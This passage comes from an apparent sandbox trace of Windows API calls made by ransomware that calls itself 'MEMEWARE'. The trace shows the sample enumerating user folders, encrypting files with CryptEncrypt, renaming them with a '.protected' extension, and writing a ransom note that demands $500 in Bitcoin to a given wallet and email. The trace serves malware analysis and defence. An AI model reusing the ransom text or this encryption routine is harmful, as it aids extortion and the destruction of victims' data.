pszDest="\\\\?\\C:\\Users\\Default\\Desktop\\RESTORE_FILES.txt") returned 46 [0095.125] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Desktop\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\desktop\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0095.125] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0095.125] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0095.126] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0095.126] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0095.126] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0095.126] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0095.126] CloseHandle (hObject=0xa4) returned 1 [0095.126] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0095.126] lstrcmpiW (lpString1="Documents", lpString2="Windows") returned -1 [0095.126] lstrcmpiW (lpString1="Documents", lpString2="Program Files") returned -1 [0095.126] lstrcmpiW (lpString1="Documents", lpString2="Program Files (x86)") returned -1 [0095.127] lstrcmpiW (lpString1="Documents", lpString2="$Recycle.bin") returned 1 [0095.127] lstrcmpiW (lpString1="Documents", lpString2="System Volume Information") returned -1 [0095.127] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents") returned 30 [0095.127] lstrcmpW (lpString1="Documents", lpString2=".") returned 1 [0095.127] lstrcmpW (lpString1="Documents", lpString2="..") returned 1 [0095.127] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents\\*") returned 32 [0095.127] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b990 [0095.127] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0095.127] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0095.127] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0095.128] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0095.128] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0095.128] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents\\.") returned 32 [0095.128] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.128] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0095.128] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0095.128] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.128] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.128] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\." (normalized: "c:\\users\\default\\documents\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.128] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.128] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0095.128] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0095.128] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0095.128] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0095.128] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0095.128] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents\\..") returned 33 [0095.128] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.128] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.128] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0095.128] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0095.128] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.128] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.128] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\.." (normalized: "c:\\users\\default"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.128] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.128] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0095.129] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0095.129] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0095.129] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0095.129] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0095.129] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents\\desktop.ini") returned 42 [0095.129] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0095.129] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0095.129] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.129] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.129] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\desktop.ini" (normalized: "c:\\users\\default\\documents\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0095.129] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Documents\\desktop.ini") returned 42 [0095.129] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0095.130] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Documents\\desktop.ini") returned 42 [0095.130] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0095.130] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Documents\\desktop.ini") returned 42 [0095.130] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0095.130] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x192, lpOverlapped=0x0) returned 1 [0095.131] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffe6e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.131] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x192, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x192, lpOverlapped=0x0) returned 1 [0095.132] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.132] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0095.132] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0095.132] CloseHandle (hObject=0xb4) returned 1 [0095.132] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents\\desktop.ini.protected") returned 52 [0095.132] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Documents\\desktop.ini" (normalized: "c:\\users\\default\\documents\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Documents\\desktop.ini.protected" (normalized: "c:\\users\\default\\documents\\desktop.ini.protected")) returned 1 [0095.133] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.133] lstrcmpiW (lpString1="My Music", lpString2="Windows") returned -1 [0095.133] lstrcmpiW (lpString1="My Music", lpString2="Program Files") returned -1 [0095.133] lstrcmpiW (lpString1="My Music", lpString2="Program Files (x86)") returned -1 [0095.134] lstrcmpiW (lpString1="My Music", lpString2="$Recycle.bin") returned 1 [0095.134] lstrcmpiW (lpString1="My Music", lpString2="System Volume Information") returned -1 [0095.134] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents\\My Music") returned 39 [0095.134] lstrcmpW (lpString1="My Music", lpString2=".") returned 1 [0095.134] lstrcmpW (lpString1="My Music", lpString2="..") returned 1 [0095.134] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents\\My Music\\*") returned 41 [0095.134] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\My Music\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0xffffffff [0095.134] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.134] lstrcmpiW (lpString1="My Pictures", lpString2="Windows") returned -1 [0095.134] lstrcmpiW (lpString1="My Pictures", lpString2="Program Files") returned -1 [0095.134] lstrcmpiW (lpString1="My Pictures", lpString2="Program Files (x86)") returned -1 [0095.134] lstrcmpiW (lpString1="My Pictures", lpString2="$Recycle.bin") returned 1 [0095.134] lstrcmpiW (lpString1="My Pictures", lpString2="System Volume Information") returned -1 [0095.134] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents\\My Pictures") returned 42 [0095.134] lstrcmpW (lpString1="My Pictures", lpString2=".") returned 1 [0095.134] lstrcmpW (lpString1="My Pictures", lpString2="..") returned 1 [0095.134] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents\\My Pictures\\*") returned 44 [0095.134] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\My Pictures\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0xffffffff [0095.134] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.134] lstrcmpiW (lpString1="My Videos", lpString2="Windows") returned -1 [0095.134] lstrcmpiW (lpString1="My Videos", lpString2="Program Files") returned -1 [0095.134] lstrcmpiW (lpString1="My Videos", lpString2="Program Files (x86)") returned -1 [0095.134] lstrcmpiW (lpString1="My Videos", lpString2="$Recycle.bin") returned 1 [0095.134] lstrcmpiW (lpString1="My Videos", lpString2="System Volume Information") returned -1 [0095.134] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents\\My Videos") returned 40 [0095.134] lstrcmpW (lpString1="My Videos", lpString2=".") returned 1 [0095.135] lstrcmpW (lpString1="My Videos", lpString2="..") returned 1 [0095.135] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents\\My Videos\\*") returned 42 [0095.135] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\My Videos\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0xffffffff [0095.135] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0095.135] FindClose (in: hFindFile=0x47b990 | out: hFindFile=0x47b990) returned 1 [0095.135] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents\\RESTORE_FILES.txt") returned 48 [0095.135] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\documents\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0095.136] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0095.136] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0095.136] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0095.136] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0095.137] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0095.137] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0095.137] CloseHandle (hObject=0xa4) returned 1 [0095.137] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0095.137] lstrcmpiW (lpString1="Downloads", lpString2="Windows") returned -1 [0095.137] lstrcmpiW (lpString1="Downloads", lpString2="Program Files") returned -1 [0095.137] lstrcmpiW (lpString1="Downloads", lpString2="Program Files (x86)") returned -1 [0095.137] lstrcmpiW (lpString1="Downloads", lpString2="$Recycle.bin") returned 1 [0095.137] lstrcmpiW (lpString1="Downloads", lpString2="System Volume Information") returned -1 [0095.137] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Downloads") returned 30 [0095.137] lstrcmpW (lpString1="Downloads", lpString2=".") returned 1 [0095.137] lstrcmpW (lpString1="Downloads", lpString2="..") returned 1 [0095.137] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Downloads\\*") returned 32 [0095.137] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Downloads\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b990 [0095.137] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0095.137] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0095.137] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0095.137] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0095.138] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0095.138] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Downloads\\.") returned 32 [0095.138] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.138] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0095.138] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0095.138] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.138] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.138] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Downloads\\." (normalized: "c:\\users\\default\\downloads\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.138] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.138] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0095.138] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0095.138] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0095.138] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0095.138] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0095.138] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Downloads\\..") returned 33 [0095.138] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.138] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.138] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0095.138] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0095.138] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.138] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.138] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Downloads\\.." (normalized: "c:\\users\\default"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.138] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.138] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0095.138] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0095.139] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0095.139] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0095.139] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0095.139] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Downloads\\desktop.ini") returned 42 [0095.139] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0095.139] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0095.139] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.139] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.139] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Downloads\\desktop.ini" (normalized: "c:\\users\\default\\downloads\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0095.139] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Downloads\\desktop.ini") returned 42 [0095.139] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0095.139] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Downloads\\desktop.ini") returned 42 [0095.140] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0095.140] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Downloads\\desktop.ini") returned 42 [0095.140] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0095.140] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x11a, lpOverlapped=0x0) returned 1 [0095.140] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffee6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.141] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x11a, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x11a, lpOverlapped=0x0) returned 1 [0095.141] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.141] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0095.141] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0095.141] CloseHandle (hObject=0xb4) returned 1 [0095.141] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Downloads\\desktop.ini.protected") returned 52 [0095.141] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Downloads\\desktop.ini" (normalized: "c:\\users\\default\\downloads\\desktop.ini"), 